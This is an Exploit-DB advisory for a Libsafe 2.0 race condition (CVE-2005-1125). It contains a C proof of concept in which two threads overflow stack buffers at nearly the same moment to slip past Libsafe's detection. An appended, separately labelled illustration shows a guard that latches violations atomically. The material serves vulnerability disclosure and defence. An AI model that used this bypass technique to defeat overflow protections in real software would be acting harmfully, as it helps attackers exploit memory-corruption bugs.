Libsafe 2.0 Multi-threaded Process Race Condition Security Bypass Weakness
2005-04-15T00:00:00
ID: EDB-ID:25429 | Type: exploitdb | Reporter: Overflow.pl | Modified: 2005-04-15T00:00:00
Description
Libsafe 2.0 Multi-threaded Process Race Condition Security Bypass Weakness. CVE-2005-1125. DoS exploit for the Linux platform.
source: http://www.securityfocus.com/bid/13190/info
Libsafe will normally kill an application when certain types of memory corruption are detected, preventing exploitation of some buffer overflow and format string vulnerabilities. A weakness has been reported that may allow Libsafe security failsafe mechanisms to be bypassed.
This vulnerability is due to a race condition that may be exposed when Libsafe is used with multi-threaded applications. The result is that Libsafe security features may be bypassed and an attack that would ordinarily be prevented may succeed. It should be noted that this is an implementation error in Libsafe that does not present a security risk unless there is a memory corruption vulnerability in a multi-threaded application on an affected computer.
This issue was reported in Libsafe 2.0-16. Other versions may also be affected.
#include <pthread.h>
#include <stdio.h>
#include <string.h>   /* strcpy */

/* volatile: func1 busy-waits on this flag, so the compiler must re-read it
 * on every iteration instead of hoisting the load out of the loop. */
volatile int ok = 0;

/* Thread 1 spins until thread 2 signals, then overflows its 8-byte stack
 * buffer. The aim is to have both overflows reach Libsafe's check at
 * (almost) the same moment. */
void *func1(void *none)
{
	char buf[8];
	while(1)
	{
		if(!ok)
			continue;
		strcpy(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
		break;
	}
	puts("func1 overflow!");   /* reached only if Libsafe did not stop the copy */
	return NULL;
}

/* Thread 2 releases thread 1 and immediately overflows its own buffer. */
void *func2(void *none)
{
	char buf[8];
	ok = 1;
	strcpy(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
	puts("func2 overflow!!");
	return NULL;
}

int main(void)
{
	pthread_t t1, t2;

	pthread_create(&t1, NULL, &func1, NULL);
	pthread_create(&t2, NULL, &func2, NULL);

	pthread_join(t1, NULL);
	pthread_join(t2, NULL);

	return 0;
}
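As an added illustration (not Libsafe's code and not part of the advisory), a hypothetical bounds-checked copy guard in the spirit of Libsafe, showing the property a detect-and-terminate hook needs in a multi-threaded process: the violation is latched process-wide with an atomic flag before the detecting thread terminates, so a second thread cannot get a copy through in the interval between detection and process exit. The names guarded_copy, guard_set_die_hook, record_only and guard_selfcheck are assumptions.

```c
#include <stdatomic.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define LONG_SRC "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  /* 36 bytes, as in the PoC above */
/* Hypothetical guard in the spirit of Libsafe; not Libsafe's own code. */
static atomic_int tripped;        /* process-wide: some thread detected a violation */
static atomic_int hook_calls;     /* how often the non-exiting hook ran (self-check) */
static void (*die_hook)(void);    /* NULL: terminate the process with _exit(1) */

void guard_set_die_hook(void (*fn)(void)) { die_hook = fn; }
int  guard_tripped(void)                  { return atomic_load(&tripped); }
void record_only(void)                    { atomic_fetch_add(&hook_calls, 1); }

/* Copies src into dst only if it fits; on a violation, latches the flag and
 * terminates. Every copy is checked, and once the flag is set every thread's
 * later copies are refused, so the interval between detection and actual
 * process exit cannot be used by another thread to get a copy through. */
int guarded_copy(char *dst, size_t dstsize, const char *src)
{
	if (atomic_load(&tripped))
		return -1;                     /* another thread already tripped */
	size_t need = strlen(src) + 1;
	if (need > dstsize) {
		atomic_store(&tripped, 1);     /* publish before doing anything slow */
		if (die_hook) die_hook(); else _exit(1);
		return -1;
	}
	memcpy(dst, src, need);
	return 0;
}

/* Returns 1 when the guard behaves as intended on the PoC's 8-byte buffer. */
int guard_selfcheck(void)
{
	char buf[8];
	guard_set_die_hook(record_only);   /* keep the process alive for the check */
	int fits    = guarded_copy(buf, sizeof buf, "fits") == 0;
	int caught  = guarded_copy(buf, sizeof buf, LONG_SRC) == -1;
	int once    = guard_tripped() == 1 && atomic_load(&hook_calls) == 1;
	int latched = guarded_copy(buf, sizeof buf, "fits") == -1;
	return fits && caught && once && latched;
}

int main(void)
{
	printf("guard self-check: %s\n", guard_selfcheck() ? "ok" : "FAILED");
	return 0;
}
```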